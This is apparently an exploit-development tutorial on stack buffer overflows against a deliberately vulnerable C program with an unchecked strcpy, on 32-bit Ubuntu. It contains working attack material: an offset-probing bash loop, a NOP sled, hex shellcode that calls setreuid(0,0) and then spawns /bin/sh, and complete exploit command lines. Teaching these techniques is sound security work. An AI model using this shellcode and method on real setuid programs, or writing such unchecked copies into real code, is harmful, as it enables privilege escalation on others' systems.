In this method we know the value of the saved EIP and just want to see how far it is located from our buffer. Let’s modify the buffer overflow example a little:

#include <stdio.h>
#include <string.h>

void copy_buffer(char buffer[],char argv[]) {
    strcpy(buffer, argv);
}

int main(int argc, char *argv[]) {
    int value = 5;
    char buffer_one[8], buffer_two[8];

    strcpy(buffer_one, "one"); /* put "one" into buffer_one */
    strcpy(buffer_two, "two"); /* put "two" into buffer_two */

    printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

    printf("\n[STRCPY] copying %zu bytes into buffer_two\n\n", strlen(argv[1]));
    copy_buffer(buffer_two, argv[1]); /* copy first argument into buffer_two */

    printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
    return 0;
}

The only difference is that we use the copy_buffer function to copy the program argument. We know that the next instruction after the call to copy_buffer is the first [AFTER] printf in main, so when copy_buffer finishes, execution should return to the address of that instruction. By setting a breakpoint on the copy_buffer call in main and examining the address of the instruction that follows it, we know which value to look for on the stack inside copy_buffer. The simplest method is to set another breakpoint on the closing brace of copy_buffer, just before the function returns. Then we examine the stack (64 bytes or more) and see where the return address and our input are located. That’s it: the distance between these two addresses is the exact number of bytes required to reach the saved EIP.

Finding the exact bytes to overwrite the EIP by experimentation

The goal here is to automate running the program with inputs of different lengths and see when it crashes. A Python script can easily do this, but here I show you a Linux Bash script instead:

 

$ for i in $(seq 1 100)
> do
> echo Trying offset $i
> ./a.out $(perl -e "print 'AAAA' x $i")
> done

 

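The first segmentation fault tells you roughly where the offset is. Each iteration adds four bytes, so the loop only narrows it down to a 4-byte step, and a crash can also come from overwriting other saved data that sits just below the saved EIP. Check the crash in a debugger to confirm the exact offset.

Once you have the exact offset, repeating AAAA that many times overwrites the saved EIP with the value 0x41414141.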

How can we execute our arbitrary command by overwriting the EIP?

Overwriting the saved EIP with a valid address of your choice redirects execution to the code you want. You may immediately ask: redirect execution where? You are writing to a buffer, remember? So you are not only overflowing the buffer to overwrite the saved EIP on the stack, you are also writing your own code into that buffer. The only remaining barrier is to find the address of the buffer, so that you can write that address over the saved EIP and, bam, the program executes the code it was given as input! This code is known as SHELLCODE.

What is a NOP slide?

Finding the address of the buffer where you inject the SHELLCODE is not that easy. Many factors, such as the environment variables and the length of the program arguments, can change the address of the buffer from one run to the next. Moreover, the address must point exactly to the beginning of the SHELLCODE. If anything shifts the address by even one byte, the SHELLCODE does not execute correctly and the program crashes. To avoid having to find the exact return address (the address of the buffer), we place NOP instructions in front of the SHELLCODE. When the CPU sees a NOP instruction it simply does nothing and moves on to the next instruction. Thus, even if the buffer moves a little, the return address still points somewhere inside the run of NOP instructions (known as a NOP slide or NOP sled), and the CPU executes NOPs one after the other until it reaches the SHELLCODE. The layout of our exploit is shown in Figure 1:

Figure 1: Layout of a buffer overflow exploit (NOP sled, then SHELLCODE, then the repeated return address)

How to find the return address that points to the SHELLCODE?

The quick answer is to use a debugger to find the address of the buffer that holds the input. When you audit open source code or a simple example like the one in this tutorial, you can easily find the address by using the variable name in the debugger.

In Linux, gdb is the usual choice, and the task is as easy as attaching to the process:
gdb -q --pid=[PROCESS-ID] --symbols=[OUTPUT-FILE]

The process ID can be retrieved with the ps command, and the output file is whatever name you gave the binary when compiling with gcc (compile with -g so that variable names are available). After attaching to the process you can get the address of the buffer with this command:
x/x [VARIABLE-NAME]

 

In Windows, it is even easier using WinDbg or Immunity Debugger:

  1. First place your .pdb file in a known location and point to it using this menu:

File-->Symbol File path

  2. Then attach to the process using this menu:

File-->Attach to process

  3. Then view the variable address using:

View-->Watch

Here you type the name of your variable.

If you do not have the symbol file and the source code, don’t worry! You can search memory for your input and retrieve the address of the beginning of the buffer. For example, in WinDbg with Mona.py installed, finding an AAAAAAAAA input pattern is as easy as:

!mona find -type asc -s "AAAAAAAAA"

SHELLCODE

Figure 2 shows a SHELLCODE:

Figure 2: SHELLCODE

These bytes, if executed, will spawn a shell for you. But to be executed they must be injected into the program, preceded by the NOP sled. One important factor for successful exploitation is the length of the vulnerable buffer. You can overflow a buffer and overwrite the saved EIP even with an 8-byte buffer such as the one in our buffer overflow example, though placing the SHELLCODE then takes more experience and knowledge. We want to put our NOP sled + SHELLCODE into the buffer, so the buffer should be at least that big. For this reason we modify our buffer overflow example like this:

#include <string.h>

int main(int argc, char *argv[]) {
    int value = 5;
    char buffer_one[8], buffer_two[250];

    if (argc < 2)
        return 1; /* nothing to copy */

    strcpy(buffer_two, argv[1]); /* unchecked copy of the first argument into buffer_two */
    return 0;
}

 

Now our vulnerable buffer is big enough to take an input that contains our NOP sled + SHELLCODE + repeated return address.

Building the exploit

OK, so far you have seen a program that is vulnerable to a buffer overflow exploit. Then you learned that a vulnerable buffer on the stack allows you to overwrite the return address. After that you learned that you can deliberately overwrite the return address so that it points to a SHELLCODE you placed in the buffer. Finally you learned how to find the address of the SHELLCODE in the buffer and how to add NOPs so that the return address does not have to be exact. Now it is time to see how we build an exploit from this information.

  1. In Linux we build the NOP sled like this:
$(perl -e 'print "\x90"x200')

This builds 200 consecutive NOP instructions for us.

  2. Then we build our SHELLCODE like this:
export SHELLCODE=$(printf "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80")

The string is the hexadecimal representation of the machine code that spawns a shell for us.

  3. Finally, assuming the address of the vulnerable buffer is 0xbffff5c0, we repeat the address 0xbffff624 10 times. That’s right, we do not repeat the buffer address itself but 0xbffff5c0 + 100 (0x64)! 100 bytes past the start of the buffer we are in the middle of the NOP instructions, so the guess stays safe even if the buffer address shifts a little. Why 10 times? That depends on the buffer length (here 250), the NOP sled size and the offset from the buffer to the saved EIP. Remember that the goal is to overflow the buffer and overwrite the saved EIP, so if 10 does not work for you, run the Bash script again to find the offset and calculate how many repeated return addresses you need:
$(perl -e 'print "\x24\xf6\xff\xbf"x10')

Did you notice? The address is in reverse byte order! That’s because the 32-bit Intel architecture that this Ubuntu 7.04 (Feisty Fawn) system runs on is little endian, which means the least significant byte is stored at the lowest address.

  4. Finally our exploit can be run as a single argument:
./a.out "$(perl -e 'print "\x90"x200')$SHELLCODE$(perl -e 'print "\x24\xf6\xff\xbf"x10')"

 

Or the exploit can be saved in an environment variable like this:

export EXPLOIT="$(perl -e 'print "\x90"x200')$SHELLCODE$(perl -e 'print "\x24\xf6\xff\xbf"x10')"

You can also save the exploit to a file:

printf '%s' "$EXPLOIT" > example_exploit

Then you can run the exploit in the future with:

./a.out "$EXPLOIT"

Or:

./a.out "$(cat example_exploit)"

 

 

Published in Exploit development